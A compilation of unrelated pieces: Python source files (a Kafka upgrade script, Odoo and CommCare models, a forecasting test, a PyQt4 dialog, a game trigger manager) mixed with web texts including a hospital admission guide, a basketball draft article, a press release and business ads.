"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from resource_management import *
from resource_management.core.resources.system import Execute
from resource_management.libraries.functions import Direction
from resource_management.libraries.functions.format import format
from resource_management.libraries.script.script import Script
class KafkaUpgrade(Script):
    """Custom upgrade actions for the Kafka service (IOP 4.1 stack)."""

    def copy_kerberos_param(self, env):
        """Patch kafka-run-class.sh during an upgrade so the JVM also
        receives $KAFKA_KERBEROS_PARAMS alongside $KAFKA_OPTS.

        Only runs when the stack upgrade direction is UPGRADE (not on
        downgrade).
        """
        import params
        # NOTE(review): the path is hard-coded to the 4.1.0.0 stack layout.
        kafka_run_path = "/usr/iop/4.1.0.0/kafka/bin/kafka-run-class.sh"
        if params.upgrade_direction is not None and params.upgrade_direction == Direction.UPGRADE:
            # Raw string so each "\$" reaches sed verbatim (escaping $ keeps
            # sed from expanding/anchoring it); "\$" in a plain string is an
            # invalid escape sequence that newer Pythons warn about.
            Execute(("sed", "-i",
                     r"s/\$CLASSPATH \$KAFKA_OPTS/\$CLASSPATH \$KAFKA_OPTS \$KAFKA_KERBEROS_PARAMS/",
                     kafka_run_path),
                    logoutput=True)

if __name__ == "__main__":
    KafkaUpgrade().execute()
|
Check out our upcoming classes and events in the calendar below. To register simply click on the event of your choice and complete the registration form.
This HUD-approved Homebuyer Education Workshop is taught in our Oxnard office in a group setting by our certified Homeownership Specialists who are trained to guide attendees through the complex homebuying process.
Center staff will be available to answer your questions!
Our homes play a critical role in shaping our health and the health of the whole community.
Learn more about the connection between health and housing along with some great tips on how to prioritize healthy eating in your family!
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, api, fields
from odoo.tools.translate import _
class SaleOrder(models.Model):
    _inherit = 'sale.order'

    # Transient, order-level availability message shown to the shopper;
    # cleared by _get_stock_warning once it has been read.
    warning_stock = fields.Char('Warning')

    def _cart_update(self, product_id=None, line_id=None, add_qty=0, set_qty=0, **kwargs):
        """Extend the website cart update to cap quantities at available stock.

        After the normal cart update, every stockable line whose product
        enforces availability ('always' or 'threshold') is checked: if the
        total cart quantity of that product exceeds its virtual (forecast)
        availability, the just-updated line is re-updated downward and a
        warning message is stored (on the line, or on the order if the line
        was dropped entirely).

        :return: the values dict from super(), possibly updated with the
                 capped line values and a 'warning' entry.
        """
        values = super(SaleOrder, self)._cart_update(product_id, line_id, add_qty, set_qty, **kwargs)
        line_id = values.get('line_id')

        for line in self.order_line:
            if line.product_id.type == 'product' and line.product_id.inventory_availability in ['always', 'threshold']:
                # Total quantity of this product across all cart lines
                # (the same product can appear on several lines).
                cart_qty = sum(self.order_line.filtered(lambda p: p.product_id.id == line.product_id.id).mapped('product_uom_qty'))
                if cart_qty > line.product_id.virtual_available and (line_id == line.id):
                    # qty is negative here: passed as add_qty, it reduces the
                    # line back down to the available quantity.
                    qty = line.product_id.virtual_available - cart_qty
                    new_val = super(SaleOrder, self)._cart_update(line.product_id.id, line.id, qty, 0, **kwargs)
                    values.update(new_val)

                    # Make sure line still exists, it may have been deleted in super()_cartupdate because qty can be <= 0
                    if line.exists() and new_val['quantity']:
                        line.warning_stock = _('You ask for %s products but only %s is available') % (cart_qty, new_val['quantity'])
                        values['warning'] = line.warning_stock
                    else:
                        self.warning_stock = _("Some products became unavailable and your cart has been updated. We're sorry for the inconvenience.")
                        values['warning'] = self.warning_stock
        return values

    @api.multi
    def _website_product_id_change(self, order_id, product_id, qty=0):
        """Extend the website line-values hook to propagate the product's
        sale delay as the line's customer lead time."""
        res = super(SaleOrder, self)._website_product_id_change(order_id, product_id, qty=qty)
        product = self.env['product.product'].browse(product_id)
        res['customer_lead'] = product.sale_delay
        return res

    @api.multi
    def _get_stock_warning(self, clear=True):
        """Return the stored stock warning message.

        :param clear: when True (default), reset the message so it is only
                      displayed once.
        """
        self.ensure_one()
        warn = self.warning_stock
        if clear:
            self.warning_stock = ''
        return warn
class SaleOrderLine(models.Model):
    _inherit = 'sale.order.line'

    # Per-line counterpart of SaleOrder.warning_stock: a transient
    # availability message for this specific cart line.
    warning_stock = fields.Char('Warning')

    @api.multi
    def _get_stock_warning(self, clear=True):
        """Return this line's stock warning; by default also clear it so
        the message is only shown once."""
        self.ensure_one()
        message = self.warning_stock
        if clear:
            self.warning_stock = ''
        return message
|
Cultiva®, manufacturer of Parka®, the industry’s first patented food-grade cuticle supplement used to protect cherries, apples, grapes, blueberries and other premium fruit throughout the world, announces a distribution partnership with Arysta LifeScience Chile. Arysta LifeScience is a global provider of crop protection and yield-enhancing products in more than 60 countries with South American offices in Chile, Argentina, Bolivia, Brazil, and Colombia.
Cultiva partnered with Oregon State University nearly a decade ago to launch the agricultural industry’s first ever food-grade cuticle supplement for premium fruit production. The company has taken an industry leading role in educating growers and crop consultants about how the cuticle impacts fruit yields, fruit quality, and decreases the need for crop protection chemicals. The company is also presently investigating how Parka can increase shelf life in food storage facilities and grocery stores.
|
from datetime import datetime
from decimal import Decimal
import itertools
import jsonfield
from django.db import models
from django.utils.translation import ugettext as _
from couchdbkit.exceptions import ResourceNotFound
from dimagi.ext.couchdbkit import (
Document,
StringProperty,
DecimalProperty,
DictProperty,
BooleanProperty,
DateTimeProperty,
)
from dimagi.utils.couch.database import iter_docs
# move these too
from corehq.apps.commtrack.exceptions import InvalidProductException, DuplicateProductCodeException
class Product(Document):
    """
    A product, e.g. "coartem" or "tylenol"

    Couch document for a product. Saving an instance also mirrors it into
    the SQLProduct table (see sync_to_sql), which is the copy used for
    efficient SQL-side filtering.
    """
    domain = StringProperty()
    name = StringProperty()
    unit = StringProperty()
    code_ = StringProperty()  # todo: why the hell is this code_ and not code
    description = StringProperty()
    category = StringProperty()
    program_id = StringProperty()
    cost = DecimalProperty()
    product_data = DictProperty()  # free-form custom/domain-specific data
    is_archived = BooleanProperty(default=False)
    last_modified = DateTimeProperty()

    @classmethod
    def wrap(cls, data):
        """Normalize raw doc JSON before wrapping: repair last_modified
        timestamps that lost their trailing "Z"."""
        from corehq.apps.groups.models import dt_no_Z_re
        # If "Z" is missing because of the Aug 2014 migration, then add it.
        # cf. Group class
        last_modified = data.get('last_modified')
        if last_modified and dt_no_Z_re.match(last_modified):
            data['last_modified'] += 'Z'
        return super(Product, cls).wrap(data)

    @classmethod
    def save_docs(cls, docs, use_uuids=True, all_or_nothing=False, codes_by_domain=None):
        """Bulk-save docs, stamping last_modified and generating a product
        code for any doc that lacks one.

        :param codes_by_domain: optional cache of {domain: existing codes},
            shared across calls to avoid re-querying SQLProduct per domain.

        NOTE(review): unlike save(), this path does not call sync_to_sql
        for each doc — confirm callers handle the SQL mirror separately.
        """
        from corehq.apps.commtrack.util import generate_code

        codes_by_domain = codes_by_domain or {}

        def get_codes(domain):
            # Lazily fetch (and memoize) the existing codes for a domain.
            if domain not in codes_by_domain:
                codes_by_domain[domain] = SQLProduct.objects.filter(domain=domain)\
                    .values_list('code', flat=True).distinct()
            return codes_by_domain[domain]

        for doc in docs:
            doc.last_modified = datetime.utcnow()
            if not doc['code_']:
                doc['code_'] = generate_code(
                    doc['name'],
                    get_codes(doc['domain'])
                )

        super(Product, cls).save_docs(docs, use_uuids, all_or_nothing)

    # Backwards-compatible alias for the bulk save entry point.
    bulk_save = save_docs

    def sync_to_sql(self):
        """Copy this couch doc's properties onto its SQLProduct mirror,
        creating the SQL row if it does not exist yet."""
        # (sql_field, couch_field) pairs; bare strings mean the names match.
        properties_to_sync = [
            ('product_id', '_id'),
            'domain',
            'name',
            'is_archived',
            ('code', 'code_'),
            'description',
            'category',
            'program_id',
            'cost',
            ('units', 'unit'),
            'product_data',
        ]

        # sync properties to SQL version
        sql_product, _ = SQLProduct.objects.get_or_create(
            product_id=self._id
        )

        for prop in properties_to_sync:
            if isinstance(prop, tuple):
                sql_prop, couch_prop = prop
            else:
                sql_prop = couch_prop = prop

            if hasattr(self, couch_prop):
                setattr(sql_product, sql_prop, getattr(self, couch_prop))

        sql_product.save()

    def save(self, *args, **kwargs):
        """
        Saving a couch version of Product will trigger
        one way syncing to the SQLProduct version of this
        product.
        """
        # mark modified time stamp for selective syncing
        self.last_modified = datetime.utcnow()

        # generate code if user didn't specify one
        if not self.code:
            from corehq.apps.commtrack.util import generate_code
            self.code = generate_code(
                self.name,
                SQLProduct.objects
                .filter(domain=self.domain)
                .values_list('code', flat=True)
                .distinct()
            )

        result = super(Product, self).save(*args, **kwargs)
        self.sync_to_sql()
        return result

    @property
    def code(self):
        # Public accessor for the awkwardly-named code_ property.
        return self.code_

    @code.setter
    def code(self, val):
        # Codes are stored lowercased; falsy values are stored as None.
        self.code_ = val.lower() if val else None

    @classmethod
    def get_by_code(cls, domain, code):
        """Look up a couch Product by (domain, code), case-insensitively,
        via the SQL mirror. Returns None when code is falsy or not found."""
        if not code:
            return None
        try:
            sql_product = SQLProduct.objects.get(domain=domain, code__iexact=code)
        except SQLProduct.DoesNotExist:
            return None
        else:
            return cls.get(sql_product.product_id)

    @classmethod
    def by_domain(cls, domain, wrap=True, include_archived=False):
        """Return the domain's couch products (archived ones excluded by
        default), resolved through the SQL mirror."""
        queryset = SQLProduct.objects.filter(domain=domain)
        if not include_archived:
            queryset = queryset.filter(is_archived=False)
        return list(queryset.couch_products(wrapped=wrap))

    @classmethod
    def ids_by_domain(cls, domain):
        """Return all product ids for a domain (archived included)."""
        return list(SQLProduct.objects.filter(domain=domain).product_ids())

    @classmethod
    def count_by_domain(cls, domain):
        """
        Gets count of products in a domain
        """
        # todo: we should add a reduce so we can get this out of couch
        return len(cls.ids_by_domain(domain))

    @classmethod
    def _export_attrs(cls):
        # Attributes included in import/export. Tuples pair the attribute
        # name with the converter applied on import (see from_excel).
        return [
            ('name', unicode),
            ('unit', unicode),
            'description',
            'category',
            ('program_id', str),
            ('cost', lambda a: Decimal(a) if a else None),
        ]

    def to_dict(self):
        """Flatten this product to a plain dict for export; note 'product_id'
        in the output is the product *code*, not the couch _id."""
        from corehq.apps.commtrack.util import encode_if_needed
        product_dict = {}

        product_dict['id'] = self._id
        product_dict['product_id'] = self.code_

        for attr in self._export_attrs():
            real_attr = attr[0] if isinstance(attr, tuple) else attr
            product_dict[real_attr] = encode_if_needed(
                getattr(self, real_attr)
            )

        return product_dict

    def custom_property_dict(self):
        """Return product_data entries keyed with a 'data: ' prefix, for
        export alongside the fixed attributes."""
        from corehq.apps.commtrack.util import encode_if_needed
        property_dict = {}

        for prop, val in self.product_data.iteritems():
            property_dict['data: ' + prop] = encode_if_needed(val)

        return property_dict

    def archive(self):
        """
        Mark a product as archived. This will cause it (and its data)
        to not show up in default Couch and SQL views.
        """
        self.is_archived = True
        self.save()

    def unarchive(self):
        """
        Unarchive a product, causing it (and its data) to show
        up in Couch and SQL views again.
        """
        if self.code:
            # Refuse to unarchive into a code collision with an active product.
            if SQLProduct.objects.filter(domain=self.domain, code=self.code, is_archived=False).exists():
                raise DuplicateProductCodeException()
        self.is_archived = False
        self.save()

    @classmethod
    def from_excel(cls, row, custom_data_validator):
        """Build (or update, when 'id' is present) a Product from an import
        row dict. Raises InvalidProductException on bad ids, missing
        required fields, or custom-data validation errors."""
        if not row:
            return None

        id = row.get('id')
        if id:
            try:
                p = cls.get(id)
            except ResourceNotFound:
                raise InvalidProductException(
                    _("Product with ID '{product_id}' could not be found!").format(product_id=id)
                )
        else:
            p = cls()

        p.code = str(row.get('product_id') or '')

        for attr in cls._export_attrs():
            key = attr[0] if isinstance(attr, tuple) else attr
            if key in row:
                val = row[key]
                if val is None:
                    val = ''
                if isinstance(attr, tuple):
                    val = attr[1](val)
                setattr(p, key, val)
            else:
                # NOTE(review): a missing column stops processing of the
                # remaining export attrs (break, not continue) — presumably
                # intentional for truncated rows; confirm.
                break

        if not p.code:
            raise InvalidProductException(_('Product ID is a required field and cannot be blank!'))
        if not p.name:
            raise InvalidProductException(_('Product name is a required field and cannot be blank!'))

        custom_data = row.get('data', {})
        error = custom_data_validator(custom_data)
        if error:
            raise InvalidProductException(error)

        p.product_data = custom_data
        p.product_data.update(row.get('uncategorized_data', {}))

        return p
class ProductQueriesMixin(object):
    """Query helpers shared by the SQLProduct queryset and its managers."""

    def product_ids(self):
        """Return a flat value list of the couch product ids in this queryset."""
        return self.values_list('product_id', flat=True)

    def couch_products(self, wrapped=True):
        """
        Returns the couch products corresponding to this queryset.
        """
        docs = iter_docs(Product.get_db(), self.product_ids())
        # Lazily wrap into Product instances unless raw dicts were requested.
        return itertools.imap(Product.wrap, docs) if wrapped else docs
class ProductQuerySet(ProductQueriesMixin, models.query.QuerySet):
    """QuerySet exposing the couch-product helpers from ProductQueriesMixin."""
class ProductManager(ProductQueriesMixin, models.Manager):
    """Default SQLProduct manager; includes archived products."""

    def get_queryset(self):
        # Hand out the custom queryset so the mixin helpers chain through.
        return ProductQuerySet(self.model, using=self._db)
class OnlyActiveProductManager(ProductManager):
    """Manager variant that excludes archived products from every query."""

    def get_queryset(self):
        base = super(OnlyActiveProductManager, self).get_queryset()
        return base.filter(is_archived=False)
class SQLProduct(models.Model):
    """
    A SQL based clone of couch Products.

    This is used to efficiently filter StockState and other
    SQL based queries to exclude data for archived products.

    Rows are written by Product.sync_to_sql(); product_id is the couch _id.
    """
    domain = models.CharField(max_length=255, db_index=True)
    product_id = models.CharField(max_length=100, db_index=True, unique=True)  # couch doc _id
    name = models.CharField(max_length=100, null=True)
    is_archived = models.BooleanField(default=False)
    code = models.CharField(max_length=100, default='', null=True)
    description = models.TextField(null=True, default='')
    category = models.CharField(max_length=100, null=True, default='')
    program_id = models.CharField(max_length=100, null=True, default='')
    cost = models.DecimalField(max_digits=20, decimal_places=5, null=True)
    units = models.CharField(max_length=100, null=True, default='')
    product_data = jsonfield.JSONField(
        default=dict,
    )
    created_at = models.DateTimeField(auto_now_add=True)
    last_modified = models.DateTimeField(auto_now=True)

    # Default manager includes archived products; use active_objects to
    # restrict queries to unarchived ones.
    objects = ProductManager()
    active_objects = OnlyActiveProductManager()

    def __unicode__(self):
        return u"{} ({})".format(self.name, self.domain)

    def __repr__(self):
        return "<SQLProduct(domain=%s, name=%s)>" % (
            self.domain,
            self.name
        )

    @classmethod
    def by_domain(cls, domain):
        """Return all of the domain's products, archived included."""
        return cls.objects.filter(domain=domain).all()

    @property
    def get_id(self):
        # Couch-compatible id accessor (mirrors Document.get_id).
        return self.product_id

    class Meta:
        app_label = 'products'
|
The wait for Bobby Brown is over; well, sort of. The former Cal-State Fullerton guard recently received his invitation to the NBA's pre-draft camp in Orlando, where he'll have the opportunity to show his stuff against other top college players from around the country in front of an audience of NBA scouts. While Brown had a poor showing in Orlando last year, he figures to have a leg up on a lot of the competition this year with his experience in the workings of the camp.
In preparation for his business trip Brown has been working with former UCLA great Don MacLean, who spent nine seasons in the NBA. Brown says that he has already gained a lot from his time with MacLean.
Training days for Brown begin at 8:30, when he wakes up and eats breakfast before hitting the court at 10. Warm-ups consist of ball-handling drills and full court passing drills, after which follows shooting drills. Its been a month since we talked to Brown, but the specific focuses of his training have not changed in that time.
Conditioning has also been a major part of Browns training. He stated that he has been participating in a lot of 1-on-1 and 2-on-2 full court drills to increase his endurance, which will be key when jumping to an 82 game season in the NBA after never playing more than 35 games at the college level.
Since he began individual training when Cal-State Fullertons season ended several weeks ago, Brown states he has noticed a definite difference between the types of coaching he received while still in school as opposed to his training now.
According to reports, the individual work has been paying off. Brown recently scrimmaged with several other college players and a handful of NBA players at the Home Depot Center in Carson, California, and put on quite a performance. When asked about his strong showing, Brown remained rather modest, choosing to focus on the fun of just playing the sport he loves.
One of the NBA players running against Brown at the Home Depot Center was Danny Granger of the Indiana Pacers, who has turned into a great contact for Brown as he works towards the pro level himself.
While Brown has been hard at work preparing for draft day, he has been able to enjoy the fact that he has completed his academic career.
In place of traditional schoolwork, Brown has been in the process of arranging workouts with NBA teams. At the present time he said that he has definite dates with only a couple of franchises, but that he has already confirmed with seven teams that he will be working out for them. Brown will be hoping for strong performances at both the private workouts as well as the pre-draft camp to help his stock as much as possible. Currently though, Brown states he has almost no clue where he is going to land come draft day.
|
import pandas as pd
import numpy as np
import pyaf.ForecastEngine as autof
import pyaf.Bench.TS_datasets as tsds
import pyaf.CodeGen.TS_CodeGenerator as tscodegen
# Exercise forecasting + SQL code generation on growing prefixes of the
# airline passengers benchmark series.
b1 = tsds.load_airline_passengers()
df = b1.mPastData

H = b1.mHorizon
N = df.shape[0]

# Train on prefixes of increasing length, stepping by 10 rows.
for n in range(2 * H, N, 10):
    df1 = df.head(n).copy()

    lEngine = autof.cForecastEngine()
    lEngine.mOptions.mEnableARModels = False
    # lEngine.mOptions.mDebugCycles = False;
    lEngine.train(df1, b1.mTimeVar, b1.mSignalVar, H)
    lEngine.getModelInfo()

    # Forecast H steps past the training data.
    dfapp_in = df1.copy()
    dfapp_out = lEngine.forecast(dfapp_in, H)
    print("Forecast Columns ", dfapp_out.columns)

    lForecastColumnName = b1.mSignalVar + '_Forecast'
    Forecast_DF = dfapp_out
    # [[b1.mTimeVar , b1.mSignalVar, lForecastColumnName , lForecastColumnName + '_Lower_Bound', lForecastColumnName + '_Upper_Bound' ]]
    print(Forecast_DF.info())
    # print("Forecasts_HEAD\n" , Forecast_DF.head(2*H).values);
    # print("Forecasts_TAIL\n" , Forecast_DF.tail(2*H).values);

    # Generate SQL from the trained engine.
    lCodeGenerator = tscodegen.cTimeSeriesCodeGenerator()
    lSQL = lCodeGenerator.testGeneration(lEngine)
|
At the Jesenice General Hospital, we are aware that hospital admission can be difficult and that you may be worried about all of the instructions. We will try to do our best to make the process as easy as possible. We would like to ensure that you are satisfied with your stay, and with our care and work.
You have been admitted to our hospital due to health problems; your admission may be scheduled or unplanned.
In the case of a scheduled admission, a nurse will coordinate the date with you and will provide all of the necessary information. On the admission day, you should present yourself at the particular clinic at the agreed time and the nurse will ensure quick and smooth admission. On admission, you will receive an identification bracelet, which should be worn for your safety until the end of your stay at our hospital. After completing the admission procedure, the nurse will take you to the ward, introduce you to the patients in your room and show you the rooms that you will use during your stay in the ward.
Please follow the instructions given either on admission or during hospitalisation.
What do you require for admission?
a personal document, convention (for foreigners).
Please also bring your personal hygiene kit, a dressing gown (if you wish), slippers, glasses, hearing and orthopaedic aids, as well as any medicines that you take.
reports on other important tests or examinations.
Please also bring your personal hygiene kit, sanitary towels, glasses, a dressing gown (if you wish), etc. The maternity ward will provide hospital linen as well as clothing and care of the newborn. If you wish, you can wear your own clothes during labour and throughout your stay at the postpartum department.
Preparing a child or adolescent for admission to hospital is very important, as preparation plays a crucial role in how he or she will accept both hospitalisation and treatment. Preparing your child or adolescent prior to admission is therefore of great importance. At home, please explain to your child or adolescent the purpose of their admission to hospital, how long they will stay and when you will be able to visit them.
For children under the age of six, one parent or a legal guardian is allowed to stay with the patient free of charge. The type of accommodation (regular bed or emergency bed) depends on spatial constraints. We recommend that the child brings a toy or a favourite object. This will help to make the experience of staying in hospital easier.
There is a hospital school within the ward. It is run by two teachers, who make sure that, after discharge, the child or adolescent can return to school without major problems.
In our Day Hospital, you will be treated after examination by and consultation with a surgeon or orthopaedic surgeon at our clinic.
The case manager will call you 7–14 days prior to the scheduled procedure (please check the phone number that you left at our clinic), and you will be given the exact admission date and time.
The case manager will check that you have received all of the necessary documentation (admission instructions, instructions for your general practitioner, explanation of anaesthesia, informed consent/refusal of medical care). If this is not the case, the documents will be sent to you later. Prior to admission, the case manager will also help you to complete all activities necessary for the performance of the surgery.
You will be admitted to the Day Hospital on the day of surgery between 7.00 and 7.30 a.m. Admission will be carried out by the case manager, who will check the documentation for the surgery together with you. The case manager will inform you about the course of your placement in the ward, the activities during your stay at the hospital, and about pain management after the surgery and at home.
In the afternoon, you will start preparing for discharge in the presence of a doctor. A nurse will provide you with all of the necessary instructions and information that you will need in your home environment. You will have to be accompanied by a responsible adult, who will supervise you overnight, as well. You are not allowed to drive a car on your way home.
On the day after hospital discharge, the case manager will call you at home and check your health and well-being. This will also be an opportunity for you to ask any questions you may have.
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'boardOptions.ui'
#
# Created: Fri Oct 4 12:49:10 2013
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
    # PyQt4 with QString API v1 provides QString.fromUtf8; under API v2
    # (and Python 3) QString is mapped to native str and the attribute is
    # missing, so fall back to an identity function.
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s
class Ui_Dialog(object):
    """pyuic4-generated dialog: three labelled combo boxes ("Balls",
    "Size", "Head") stacked vertically, plus an OK/Cancel button box.

    NOTE: this class is generated from boardOptions.ui. Edit the .ui file
    and regenerate instead of changing this code by hand (see the header
    warning); the code is therefore left byte-for-byte as generated.
    """

    def setupUi(self, Dialog):
        """Build the widget tree, layouts and signal connections on *Dialog*."""
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.setWindowModality(QtCore.Qt.WindowModal)
        Dialog.resize(600, 400)
        #Dialog.setMaximumSize(QtCore.QSize(400, 400))
        # OK/Cancel buttons; wired to Dialog.accept/reject below.
        self.buttonBox = QtGui.QDialogButtonBox(Dialog)
        #self.buttonBox.setGeometry(QtCore.QRect(60, 260, 251, 32))
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
        # Container widget holding the vertical stack of label/combo rows.
        self.widget = QtGui.QWidget(Dialog)
        #self.widget.setGeometry(QtCore.QRect(50, 30, 300, 300))
        self.widget.setObjectName(_fromUtf8("widget"))
        self.verticalLayout = QtGui.QVBoxLayout(self.widget)
        #self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # Row 1: "Balls" label + combo box.
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(self.widget)
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        self.comboBox = QtGui.QComboBox(self.widget)
        self.comboBox.setObjectName(_fromUtf8("comboBox"))
        self.horizontalLayout.addWidget(self.comboBox)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Row 2: "Size" label + combo box.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.label_2 = QtGui.QLabel(self.widget)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.horizontalLayout_2.addWidget(self.label_2)
        self.comboBox_2 = QtGui.QComboBox(self.widget)
        self.comboBox_2.setObjectName(_fromUtf8("comboBox_2"))
        self.horizontalLayout_2.addWidget(self.comboBox_2)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Row 3: "Head" label + combo box.
        self.horizontalLayout_3 = QtGui.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.label_3 = QtGui.QLabel(self.widget)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.horizontalLayout_3.addWidget(self.label_3)
        self.comboBox_3 = QtGui.QComboBox(self.widget)
        self.comboBox_3.setObjectName(_fromUtf8("comboBox_3"))
        self.horizontalLayout_3.addWidget(self.comboBox_3)
        self.verticalLayout.addLayout(self.horizontalLayout_3)
        # Give all three combo boxes a common minimum width.
        self.comboBox.setMinimumWidth(250)
        self.comboBox_2.setMinimumWidth(250)
        self.comboBox_3.setMinimumWidth(250)
        self.retranslateUi(Dialog)
        # Old-style (PyQt4) signal/slot connections for the button box.
        QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("accepted()")), Dialog.accept)
        QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("rejected()")), Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set the (translatable) window title and label texts."""
        Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Dialog", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("Dialog", "Balls", None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate("Dialog", "Size", None, QtGui.QApplication.UnicodeUTF8))
        self.label_3.setText(QtGui.QApplication.translate("Dialog", "Head", None, QtGui.QApplication.UnicodeUTF8))
|
CJ's Hood Cleaning is a commercial kitchen cleaning company that is value-oriented and completes every job with great attention to detail and care. We take great pride in being the preferred partner to clients in Paterson, NJ. We have a strong reputation for delivering high-quality services, and our kitchen equipment and hood cleaning service exceeds compliance requirements and safety standards. It is our goal to attain complete customer satisfaction. With more than seven years of industry experience, we are fully licensed and insured to handle every job you have for us! And if you are still not sure why you should hire us, below is a list that will help you understand who we are and why you should choose us instead of others.
Very professional and reliable! The cleaners are very thorough, and everything they clean is immaculate! I am more than pleased with the quality of their work and will continue to use their services!
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2015 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import trigger as tm
class Space(object):
    """Minimal stand-in for a game space, used by the trigger demo below."""

    def __init__(self):
        pass

    def monster_count(self):
        """Return the number of monsters alive in this space (always 0 here)."""
        return 0
class TriggerManager(object):
    """Registry of event triggers bound to a game space.

    Trigger classes are looked up by name (``Trigger<no>``) in the
    ``trigger`` module (imported as ``tm``), instantiated per
    registration, and fed game events via :meth:`on_event_notify` until
    they report completion.
    """

    def __init__(self, space=None):
        self.space = space
        self.triggers = {}              # trigger_no -> trigger instance
        self.activate_triggers = set()  # trigger_nos that still receive events

    def register(self, trigger_no, infos):
        """Instantiate ``Trigger<trigger_no>`` and (if activatable) activate it.

        Fix: the original ``getattr(tm, trigger_name)`` raised
        AttributeError for unknown trigger numbers before the
        ``if trigger_type:`` guard could run; a ``None`` default makes the
        guard effective, so unknown numbers are now silently skipped.
        """
        trigger_name = 'Trigger%d' % trigger_no
        trigger_type = getattr(tm, trigger_name, None)
        if trigger_type:
            trigger = trigger_type(self.space, infos)
            self.triggers[trigger_no] = trigger
            if trigger.activatiable():
                self.activate_triggers.add(trigger_no)

    def unregister(self, trigger_no):
        """Remove a trigger; unknown ids are a no-op."""
        self.triggers.pop(trigger_no, None)

    def on_event_notify(self, notify, *args):
        """Dispatch event ``notify`` to every active trigger.

        Completed trigger ids are collected first and deactivated after
        the loop so the active set is not mutated while being iterated.
        """
        completed_triggers = []
        for trigger_no in self.activate_triggers:
            trigger = self.triggers.get(trigger_no, None)
            if not trigger:
                continue
            on_event = getattr(trigger, notify, None)
            if on_event:
                on_event(*args)
            if trigger.is_completed():
                completed_triggers.append(trigger_no)
        # Plain loop instead of a list comprehension used only for its
        # side effects.
        for trigger_no in completed_triggers:
            self.activate_triggers.discard(trigger_no)
if __name__ == '__main__':
    # Smoke test: requires a `Trigger1101` class in the `trigger` module
    # (imported above as `tm`); registers it against a dummy space and
    # fires one event notification.
    space = Space()
    trigger_mgr = TriggerManager(space)
    trigger_mgr.register(1101, {'cond': 0, 'action': 'all monsters dead !!!'})
    trigger_mgr.on_event_notify('on_monster_die')
|
Salesforce Consulting services, Integration, App Development, Project Management and Quality Control in various industries like Automotive, Health Care, Marketing, Insurance.
We specialize in advanced Salesforce Development utilizing iterative methods and version control. This is the key to timely results with minimal risks.
Complete End to End Development, Administration, Deployment & Live Salesforce Application Support For Your Org.
Rated 5.0 / 5.0 based on 237 ratings for Salesforce and custom development services across various IT niches.
Our clients get a stable in-house team of developers, skillful at implementing Salesforce solutions. On top of that, we have plenty of ready-made solutions, which will save your time and money.
Deadlines are set – they have to be met. On-time delivery is one of the most appreciated advantages of working with us.
Once we agree on a price we will never change or extend it. You can always feel comfortable knowing the first project quote is final.
We always offer 1 year of maintenance and technical support after the project launches. We’ll fix any issues, even if they occur post-delivery.
Hub Helping connect hospitals and suppliers to securely sell medical inventories.
Payne Auto Group Navigate auto insurance seamlessly in one, organized online hub.
|
from rest_framework.test import APITestCase
